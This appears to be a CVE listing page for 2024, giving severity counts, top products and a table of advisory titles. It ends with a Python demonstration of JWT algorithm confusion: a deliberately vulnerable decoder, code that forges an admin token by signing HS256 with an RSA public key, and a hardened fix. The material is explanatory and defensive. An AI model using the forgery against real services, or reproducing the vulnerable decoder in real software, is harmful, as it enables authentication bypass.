CVEs from 2024
- Total: 6,592
- Critical: 174
- High: 1,069
- Medium: 2,083
- Low: 49
- % Critical: 2.6%
- % with KEV (listed in CISA's Known Exploited Vulnerabilities catalog): 2.5%
- % with exploit: 3.4%

The four severity buckets sum to 3,375; the remaining 3,217 entries carry no severity rating (shown as "unknown" in the table below).
Top products
- mbed_tls 15
- operations_analytics_log_analysis 14
- surveillance_station 12
- checkmk 10
- office 8
- profilegrid 8
- office_long_term_servicing_channel 6
- propertyhive 5
Top packages
| CVE | Severity | CVSS | Risk | Published | Description | Flags | OS | Vendor |
|---|---|---|---|---|---|---|---|---|
| CVE-2024-41948 | unknown | — | — | 2y ago | biscuit-java vulnerable to public key confusion in third party block | |||
| CVE-2024-23444 | unknown | — | — | 2y ago | Elasticsearch stores private key on disk unencrypted | |||
| CVE-2024-37901 | unknown | — | — | 2y ago | XWiki Platform vulnerable to remote code execution from account via SearchSuggestConfigSheet | |||
| CVE-2024-37900 | unknown | — | — | 2y ago | XWiki Platform vulnerable to Cross-site Scripting through attachment filename in uploader | |||
| CVE-2024-37898 | unknown | — | — | 2y ago | XWiki Platform vulnerable to document deletion and overwrite from edit | |||
| CVE-2024-41110 | unknown | — | — | 2y ago | Moby is an open-source project created by Docker for software containerization. A security vulnerability has been detected in certain versions of Docker Engine, which could allow an attacker to bypas… | |||
| CVE-2024-40094 | unknown | — | — | 2y ago | GraphQL Java does not properly consider ExecutableNormalizedFields (ENFs) as part of preventing denial of service | |||
| CVE-2024-29068 | unknown | — | — | 2y ago | In snapd versions prior to 2.62, snapd failed to properly check the file type when extracting a snap. The snap format is a squashfs file-system image and so can contain files that are non-regular fil… | |||
| CVE-2024-1724 | unknown | — | — | 2y ago | In snapd versions prior to 2.62, when using AppArmor for enforcement of sandbox permissions, snapd failed to restrict writes to the $HOME/bin path. In Ubuntu, when this path exists, it is automatica… | |||
| CVE-2024-29069 | unknown | — | — | 2y ago | In snapd versions prior to 2.62, snapd failed to properly check the destination of symbolic links when extracting a snap. The snap format is a squashfs file-system image and so can contain symbolic … | |||
| CVE-2024-41667 | unknown | — | — | 2y ago | OpenAM FreeMarker template injection | |||
| CVE-2024-37084 | unknown | — | — | 2y ago | Remote code execution in Spring Cloud Data Flow | |||
| CVE-2024-39676 | unknown | — | — | 2y ago | Apache Pinot: Unauthorized endpoint exposed sensitive information | |||
| CVE-2024-40767 | unknown | — | — | 2y ago | In OpenStack Nova before 27.4.1, 28 before 28.2.1, and 29 before 29.1.1, by supplying a raw format image that is actually a crafted QCOW2 image with a backing file path or VMDK flat image with a desc… | |||
| CVE-2024-25638 | unknown | — | — | 2y ago | DNSJava DNSSEC Bypass | |||
| CVE-2024-38503 | unknown | — | — | 2y ago | Apache Syncope Improper Input Validation vulnerability | |||
| CVE-2024-23321 | unknown | — | — | 2y ago | Apache RocketMQ Vulnerable to Unauthorized Exposure of Sensitive Data | |||
| CVE-2024-6960 | unknown | — | — | 2y ago | H2O vulnerable to Deserialization of Untrusted Data | |||
| CVE-2024-32007 | unknown | — | — | 2y ago | Apache CXF Denial of Service vulnerability in JOSE | |||
| CVE-2024-29736 | unknown | — | — | 2y ago | Apache CXF: SSRF vulnerability via WADL stylesheet parameter | |||
| CVE-2024-41172 | unknown | — | — | 2y ago | Apache CXF allows unrestricted memory consumption in CXF HTTP clients | |||
| CVE-2024-40642 | unknown | — | — | 2y ago | Absent Input Validation in BinaryHttpParser | |||
| CVE-2024-39900 | unknown | — | — | 2y ago | The OpenSearch reporting plugin improperly controls tenancy access to reporting resources | |||
| CVE-2024-29178 | unknown | — | — | 2y ago | Apache StreamPark: FreeMarker SSTI RCE Vulnerability | |||
| CVE-2024-40644 | unknown | — | — | 2y ago | gitoxide An idiomatic, lean, fast & safe pure Rust implementation of Git. `gix-path` can be tricked into running another `git.exe` placed in an untrusted location by a limited user account on Windows… | |||
| CVE-2024-29120 | unknown | — | — | 2y ago | Apache StreamPark: Information leakage vulnerability | |||
| CVE-2024-31411 | unknown | — | — | 2y ago | Apache StreamPipes has potential remote code execution (RCE) via file upload | |||
| CVE-2024-31979 | unknown | — | — | 2y ago | Apache StreamPipes has possibility of SSRF in pipeline element installation process | |||
| CVE-2024-30471 | unknown | — | — | 2y ago | Apache StreamPipes potentially allows creation of multiple identical accounts | |||
| CVE-2024-29737 | unknown | — | — | 2y ago | Apache StreamPark: maven build params could trigger remote command execution | |||
| CVE-2024-36522 | unknown | — | — | 2y ago | Apache Wicket: Remote code execution via XSLT injection | |||
| CVE-2024-6484 | unknown | — | — | 2y ago | Withdrawn Advisory: Bootstrap Cross-Site Scripting (XSS) vulnerability | |||
| CVE-2024-39901 | unknown | — | — | 2y ago | OpenSearch Observability does not properly restrict access to private tenant resources | |||
| CVE-2024-39614 | unknown | — | — | 2y ago | An issue was discovered in Django 5.0 before 5.0.7 and 4.2 before 4.2.14. get_supported_language_variant() was subject to a potential denial-of-service attack when used with very long strings contain… | |||
| CVE-2024-39330 | unknown | — | — | 2y ago | An issue was discovered in Django 5.0 before 5.0.7 and 4.2 before 4.2.14. Derived classes of the django.core.files.storage.Storage base class, when they override generate_filename() without replicati… | |||
| CVE-2024-39329 | unknown | — | — | 2y ago | An issue was discovered in Django 5.0 before 5.0.7 and 4.2 before 4.2.14. The django.contrib.auth.backends.ModelBackend.authenticate() method allows remote attackers to enumerate users via a timing a… | |||
| CVE-2024-38875 | unknown | — | — | 2y ago | An issue was discovered in Django 4.2 before 4.2.14 and 5.0 before 5.0.7. urlize and urlizetrunc were subject to a potential denial of service attack via certain inputs with a very large number of br… | |||
| CVE-2024-39031 | unknown | — | — | 2y ago | Silverpeas Core Cross-site Scripting vulnerability | |||
| CVE-2024-22271 | unknown | — | — | 2y ago | Spring Cloud Function Framework vulnerable to Denial of Service | |||
| CVE-2024-38372 | unknown | — | — | 2y ago | Undici is an HTTP/1.1 client, written from scratch for Node.js. Depending on network and process conditions of a `fetch()` request, `response.arrayBuffer()` might include portion of memory from the N… | |||
| CVE-2024-3653 | unknown | — | — | 2y ago | Undertow Missing Release of Memory after Effective Lifetime vulnerability | |||
| CVE-2024-5971 | unknown | — | — | 2y ago | Undertow Denial of Service vulnerability | |||
| CVE-2024-37389 | unknown | — | — | 2y ago | Apache NiFi vulnerable to Cross-site Scripting | |||
| CVE-2024-39689 | unknown | — | — | 2y ago | Certifi is a curated collection of Root Certificates for validating the trustworthiness of SSL certificates while verifying the identity of TLS hosts. Certifi starting in 2021.5.30 and prior to 2024.… | |||
| CVE-2024-32498 | unknown | — | — | 2y ago | An issue was discovered in OpenStack Cinder through 24.0.0, Glance before 28.0.2, and Nova before 29.0.3. Arbitrary file access can occur via custom QCOW2 external data. By supplying a crafted QCOW2 … | |||
| CVE-2024-39236 | unknown | — | — | 2y ago | Withdrawn Advisory: Gradio was discovered to contain a code injection vulnerability via the component /gradio/component_meta.py | |||
| CVE-2024-24749 | unknown | — | — | 2y ago | Classpath resource disclosure in GWC Web Resource API on Windows / Tomcat | |||
| CVE-2024-34696 | unknown | — | — | 2y ago | GeoServer's Server Status shows sensitive environmental variables and Java properties | |||
| CVE-2024-39458 | unknown | — | — | 2y ago | Exposure of secrets through system log in Jenkins Structs Plugin | |||
| CVE-2024-39460 | unknown | — | — | 2y ago | Bitbucket OAuth access token exposed in the build log by Bitbucket Branch Source Plugin | |||
| CVE-2024-39459 | unknown | — | — | 2y ago | Secret file credentials stored unencrypted in rare cases by Plain Credentials Plugin | |||
| CVE-2024-58261 | unknown | — | — | 2y ago | The sequoia-openpgp crate 1.13.0 before 1.21.0 for Rust allows an infinite loop of "Reading a cert: Invalid operation: Not a Key packet" messages for RawCertParser operations that encounter an unsupp… | |||
| CVE-2024-38364 | unknown | — | — | 2y ago | DSpace Cross Site Scripting (XSS) via a deposited HTML/XML document | |||
| CVE-2024-38374 | unknown | — | — | 2y ago | Improper Restriction of XML External Entity Reference in org.cyclonedx:cyclonedx-core-java | |||
| CVE-2024-38369 | unknown | — | — | 2y ago | XWiki programming rights may be inherited by inclusion | |||
| CVE-2024-29868 | unknown | — | — | 2y ago | Apache StreamPipes: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in Recovery Token Generation | |||
| CVE-2024-27136 | unknown | — | — | 2y ago | Cross site scripting in Apache JSPWiki | |||
| CVE-2024-5967 | unknown | — | — | 2y ago | Keycloak leaks configured LDAP bind credentials through the Keycloak admin console | |||
| CVE-2024-37899 | unknown | — | — | 2y ago | XWiki Platform allows remote code execution from user account | |||
| CVE-2024-6162 | unknown | — | — | 2y ago | Undertow's url-encoded request path information can be broken on ajp-listener | |||
| CVE-2024-38595 | unknown | — | — | 2y ago | In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Fix peer devlink set for SF representor devlink port The cited patch change register devlink flow, and neglect to refle… | |||
| CVE-2024-36543 | unknown | — | — | 2y ago | STRIMZI incorrect access control | |||
| CVE-2024-37902 | unknown | — | — | 2y ago | DeepJavaLibrary API absolute path traversal | |||
| CVE-2024-38460 | unknown | — | — | 2y ago | SonarQube logs sensitive information | |||
| CVE-2024-37309 | unknown | — | — | 2y ago | CrateDB has a Client initialized Session-Renegotiation DoS | |||
| CVE-2024-37280 | unknown | — | — | 2y ago | Elasticsearch StackOverflow vulnerability | |||
| CVE-2024-1722 | unknown | — | — | 2y ago | Keycloak Denial of Service via account lockout | |||
| CVE-2024-36263 | unknown | — | — | 2y ago | Apache Submarine Server Core has a SQL Injection Vulnerability | |||
| CVE-2024-36265 | unknown | — | — | 2y ago | Apache Submarine Server Core Incorrect Authorization vulnerability | |||
| CVE-2024-36264 | unknown | — | — | 2y ago | Apache Submarine Commons Utils has a hard-coded secret | |||
| CVE-2024-3656 | unknown | — | — | 2y ago | Keycloak's admin API allows low privilege users to use administrative functions | |||
| CVE-2024-35255 | unknown | — | — | 2y ago | Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability | |||
| CVE-2024-35241 | unknown | — | — | 2y ago | Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `status`, `reinstall` and `remove` commands with packages installed from source via git containing … | |||
| CVE-2024-35242 | unknown | — | — | 2y ago | Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `composer install` command running inside a git/hg repository which has specially crafted branch na… | |||
| CVE-2024-4540 | unknown | — | — | 2y ago | Keycloak exposes sensitive information in Pushed Authorization Requests (PAR) | |||
| CVE-2024-37568 | unknown | — | — | 2y ago | lepture Authlib before 1.3.1 has algorithm confusion with asymmetric public keys. Unless an algorithm is specified in a jwt.decode call, HMAC verification is allowed with any asymmetric public key. (… | |||
| CVE-2024-36823 | unknown | — | — | 2y ago | Weak encryption in Ninja Core | |||
| CVE-2024-5187 | unknown | — | — | 2y ago | onnx allows Arbitrary File Overwrite in download_model_with_test_data | |||
| CVE-2024-36121 | unknown | — | — | 2y ago | BoringSSLAEADContext in Netty Repeats Nonces | |||
| CVE-2024-36124 | unknown | — | — | 2y ago | iq80 Snappy out-of-bounds read when uncompressing data, leading to JVM crash | |||
| CVE-2024-0336 | unknown | — | — | 2y ago | Missing Authentication for Critical Function vulnerability in EMTA Grup PDKS allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects PDKS: from V3.04 before 20240… | |||
| CVE-2024-36042 | unknown | — | — | 2y ago | Silverpeas authentication bypass | |||
| CVE-2024-36114 | unknown | — | — | 2y ago | Decompressors can crash the JVM and leak memory content in Aircompressor | |||
| CVE-2024-5520 | unknown | — | — | 2y ago | OpenCMS Cross-Site Scripting vulnerability | |||
| CVE-2024-35219 | unknown | — | — | 2y ago | OpenAPI Generator Online - Arbitrary File Read/Delete | |||
| CVE-2024-0851 | unknown | — | — | 2y ago | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Grup Arge Energy and Control Systems Smartpower allows SQL Injection. This issue affects Smartpo… | |||
| CVE-2024-22588 | unknown | — | — | 2y ago | Kwik does not discard unused encryption keys | |||
| CVE-2024-5273 | unknown | — | — | 2y ago | Jenkins Report Info Plugin Path Traversal vulnerability | |||
| CVE-2024-5165 | unknown | — | — | 2y ago | Eclipse Ditto vulnerable to Cross-site Scripting | |||
| CVE-2024-29392 | unknown | — | — | 2y ago | Silverpeas Core vulnerable to Cross Site Scripting | |||
| CVE-2024-35186 | unknown | — | — | 2y ago | gitoxide is a pure Rust implementation of Git. During checkout, `gix-worktree-state` does not verify that paths point to locations in the working tree. A specially crafted repository can, when cloned… | |||
| CVE-2024-35197 | unknown | — | — | 2y ago | gitoxide is a pure Rust implementation of Git. On Windows, fetching refs that clash with legacy device names reads from the devices, and checking out paths that clash with such names writes arbitrary… | |||
| CVE-2024-28087 | unknown | — | — | 2y ago | Bonitasoft Runtime Community edition contains an insecure direct object reference vulnerability | |||
| CVE-2024-32888 | unknown | — | — | 2y ago | Amazon JDBC Driver for Redshift SQL Injection via line comment generation | |||
| CVE-2024-32077 | unknown | — | — | 2y ago | Apache Airflow: XSS vulnerability in Task Instance Log/Log Details | |||
| CVE-2024-3462 | unknown | — | — | 2y ago | Ant Media Server does not properly authorize non-administrative API calls | |||
| CVE-2024-34365 | unknown | — | — | 2y ago | Apache Karaf Cave: Cave SSRF and arbitrary file access | |||
| CVE-2024-29857 | unknown | — | — | 2y ago | Bouncy Castle certificate parsing issues cause high CPU usage during parameter evaluation. | |||
| CVE-2024-30172 | unknown | — | — | 2y ago | Bouncy Castle crafted signature and public key can be used to trigger an infinite loop | |||
| CVE-2024-30171 | unknown | — | — | 2y ago | Bouncy Castle affected by timing side-channel for RSA key exchange ("The Marvin Attack") |
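One entry above, CVE-2024-37568 (Authlib), describes the JWT algorithm-confusion class: when the verifier lets the token header choose the algorithm, an attacker who knows only the server's RSA public key can mint an HS256 token using the public key bytes as the HMAC secret, and the verifier will accept it. The block below is an added example written for this page, not Authlib's code. It assumes a toy RSA keypair generated in-process (512-bit, PKCS#1 v1.5 padding, no key validation, demo only) and a JSON serialization standing in for the PEM text a server would hold; the function names `decode_vulnerable`, `decode_hardened`, `encode` and `run_demo` are illustrative.

```python
import base64, hashlib, hmac, json, math, random

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

# --- Toy RSA, generated in-process so the demo runs offline (assumption: demo only, not for real use) ---
def _probable_prime(n: int, rounds: int = 16) -> bool:
    r = ((n - 1) & -(n - 1)).bit_length() - 1  # n-1 = d * 2**r with d odd
    d = (n - 1) >> r
    for _ in range(rounds):  # Miller-Rabin rounds
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def _gen_prime(bits: int) -> int:
    while True:
        c = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if _probable_prime(c):
            return c

def generate_rsa_keypair(bits: int = 512):
    e = 65537
    while True:
        p, q = _gen_prime(bits // 2), _gen_prime(bits // 2)
        n, phi = p * q, (p - 1) * (q - 1)
        if p != q and n.bit_length() == bits and math.gcd(e, phi) == 1:
            return {"kty": "RSA", "n": n, "e": e}, {"kty": "RSA", "n": n, "d": pow(e, -1, phi)}

def _emsa_pkcs1_v15(msg: bytes, k: int) -> int:
    t = bytes.fromhex("3031300d060960864801650304020105000420") + hashlib.sha256(msg).digest()
    return int.from_bytes(b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t, "big")

def rsa_sign(priv: dict, msg: bytes) -> bytes:
    k = (priv["n"].bit_length() + 7) // 8
    return pow(_emsa_pkcs1_v15(msg, k), priv["d"], priv["n"]).to_bytes(k, "big")

def rsa_verify(pub: dict, msg: bytes, sig: bytes) -> bool:
    k = (pub["n"].bit_length() + 7) // 8
    return len(sig) == k and pow(int.from_bytes(sig, "big"), pub["e"], pub["n"]) == _emsa_pkcs1_v15(msg, k)

def public_key_bytes(pub: dict) -> bytes:
    # Stands in for the PEM text a server holds and an attacker can fetch (e.g. from a JWKS endpoint).
    return json.dumps({"kty": "RSA", "n": pub["n"], "e": pub["e"]}).encode()

def _key_bytes(key: dict) -> bytes:
    # What a confused verifier feeds HMAC: the 'oct' secret, or the serialized public key.
    return key["k"] if key["kty"] == "oct" else public_key_bytes(key)

def encode(payload: dict, key: dict, alg: str) -> str:
    h = b64url(json.dumps({"alg": alg, "typ": "JWT"}).encode())
    p = b64url(json.dumps(payload).encode())
    si = f"{h}.{p}".encode()
    sig = hmac.new(_key_bytes(key), si, hashlib.sha256).digest() if alg == "HS256" else rsa_sign(key, si)
    return f"{h}.{p}.{b64url(sig)}"

def decode_vulnerable(token: str, key: dict) -> dict:
    """Lets the attacker-controlled header pick the verification routine (CVE-2024-37568 class)."""
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h))["alg"]
    si, sig = f"{h}.{p}".encode(), b64url_decode(s)
    if alg == "HS256":
        ok = hmac.compare_digest(hmac.new(_key_bytes(key), si, hashlib.sha256).digest(), sig)
    else:
        ok = alg == "RS256" and rsa_verify(key, si, sig)
    if not ok:
        raise ValueError("invalid signature")
    return json.loads(b64url_decode(p))

def decode_hardened(token: str, key: dict, algorithms) -> dict:
    """Fix: the caller pins the allowed algorithms, and the key type must fit the alg family."""
    alg = json.loads(b64url_decode(token.split(".")[0]))["alg"]
    if alg not in algorithms:
        raise ValueError(f"alg {alg!r} not allowed")
    if (alg == "HS256") != (key["kty"] == "oct"):
        raise ValueError(f"key type {key['kty']!r} cannot verify {alg!r}")
    return decode_vulnerable(token, key)  # routing is safe once alg and key type are pinned

def run_demo():
    pub, priv = generate_rsa_keypair()
    legit = encode({"sub": "alice"}, priv, "RS256")
    # Attacker knows only the public key and signs HS256 with its bytes as the HMAC secret.
    forged = encode({"sub": "admin"}, {"kty": "oct", "k": public_key_bytes(pub)}, "HS256")
    accepted = decode_vulnerable(forged, pub)["sub"] == "admin"
    try:
        decode_hardened(forged, pub, algorithms=["RS256"])
        rejected = False
    except ValueError:
        rejected = True
    return accepted, rejected, decode_hardened(legit, pub, ["RS256"])["sub"] == "alice"
```

`run_demo()` returns `(True, True, True)`: the forged token is accepted by `decode_vulnerable`, rejected by `decode_hardened`, and the legitimately RS256-signed token still verifies. The vulnerable path mirrors calling `jwt.decode` without naming an algorithm, as the advisory describes; the fix is two checks, an explicit allow-list supplied by the caller and a refusal to use an asymmetric key as an HMAC secret, so that even an allow-list containing HS256 cannot be abused with the RSA key.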